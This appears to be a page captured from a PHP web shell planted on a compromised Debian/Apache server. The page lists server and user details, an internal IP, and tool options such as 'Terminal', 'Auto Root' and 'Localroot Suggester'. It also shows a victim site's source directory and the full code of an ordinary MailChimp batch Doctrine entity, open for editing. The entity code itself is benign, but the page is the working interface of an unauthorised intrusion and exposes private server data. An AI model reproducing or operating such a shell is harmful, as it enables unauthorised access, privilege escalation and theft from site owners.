Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
src /
ContactBundle /
Entity /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
ContactMethod.php
1.14
KB
-rwxrwxr-x
2026-05-25 12:28
ContactReason.php
1.14
KB
-rwxrwxr-x
2026-05-25 12:28
MailChimpBatch.php
3.4
KB
-rwxrwxr-x
2026-04-02 11:48
Message.php
15.03
KB
-rwxrwxr-x
2026-05-18 12:51
MessageAttachment.php
1.78
KB
-rwxrwxr-x
2026-05-18 12:51
MessageCredit.php
6.23
KB
-rwxrwxr-x
2026-05-18 12:51
MessageEmbeddedImage.php
1.64
KB
-rwxrwxr-x
2026-05-18 12:51
MessageError.php
2.37
KB
-rwxrwxr-x
2026-05-18 12:51
MessageRecipient.php
8.45
KB
-rwxrwxr-x
2026-05-18 12:51
MessageStat.php
6.03
KB
-rwxrwxr-x
2026-05-18 12:51
MessageType.php
1.18
KB
-rwxrwxr-x
2026-05-25 12:28
Save
Rename
<?php namespace App\ContactBundle\Entity; use Doctrine\DBAL\Types\Types; use Doctrine\ORM\Mapping as ORM; /** * MailChimp Batch Entity * * @author Otto Saayman <otto@igotafrica.com> * @package ContactBundle * @subpackage Entity * @version 0.0.1 * * @ORM\Entity * @ORM\Table(name="mailchimp_batch") */ class MailChimpBatch { /** * @ORM\Id * @ORM\Column(type="string", length=255) */ private ?string $id = null; /** * @ORM\Column(type="string", length=50, nullable=true) */ private ?string $status = null; /** * @ORM\Column(type="integer", nullable=true) */ private ?int $totalOperations = null; /** * @ORM\Column(type="integer", nullable=true) */ private ?int $finishedOperations = null; /** * @ORM\Column(type="integer", nullable=true) */ private ?int $erroredOperations = null; /** * @ORM\Column(type="datetime", nullable=true) */ private ?\DateTime $submittedAt = null; /** * @ORM\Column(type="datetime", nullable=true) */ private ?\DateTime $completedAt = null; /** * @ORM\Column(type="text", nullable=true) */ private ?string $responseBodyUrl = null; /** * @ORM\Column(type="text", nullable=true) */ private ?string $jsonReports = null; public function getId(): ?string { return $this->id; } public function setId(?string $id): self { $this->id = $id; return $this; } public function getStatus(): ?string { return $this->status; } public function setStatus(?string $status): self { $this->status = $status; return $this; } public function getTotalOperations(): ?int { return $this->totalOperations; } public function setTotalOperations(?int $totalOperations): self { $this->totalOperations = $totalOperations; return $this; } public function getFinishedOperations(): ?int { return $this->finishedOperations; } public function setFinishedOperations(?int $finishedOperations): self { $this->finishedOperations = $finishedOperations; return $this; } public function getErroredOperations(): ?int { return $this->erroredOperations; } public function setErroredOperations(?int $erroredOperations): self { $this->erroredOperations = $erroredOperations; return $this; } public function getSubmittedAt(): ?\DateTime { return $this->submittedAt; } public function setSubmittedAt(?\DateTime $submittedAt): self { $this->submittedAt = $submittedAt; return $this; } public function getCompletedAt(): ?\DateTime { return $this->completedAt; } public function setCompletedAt(?\DateTime $completedAt): self { $this->completedAt = $completedAt; return $this; } public function getResponseBodyUrl(): ?string { return $this->responseBodyUrl; } public function setResponseBodyUrl(?string $responseBodyUrl): self { $this->responseBodyUrl = $responseBodyUrl; return $this; } public function getJsonReports(): ?string { return $this->jsonReports; } public function setJsonReports(?string $jsonReports): self { $this->jsonReports = $jsonReports; return $this; } }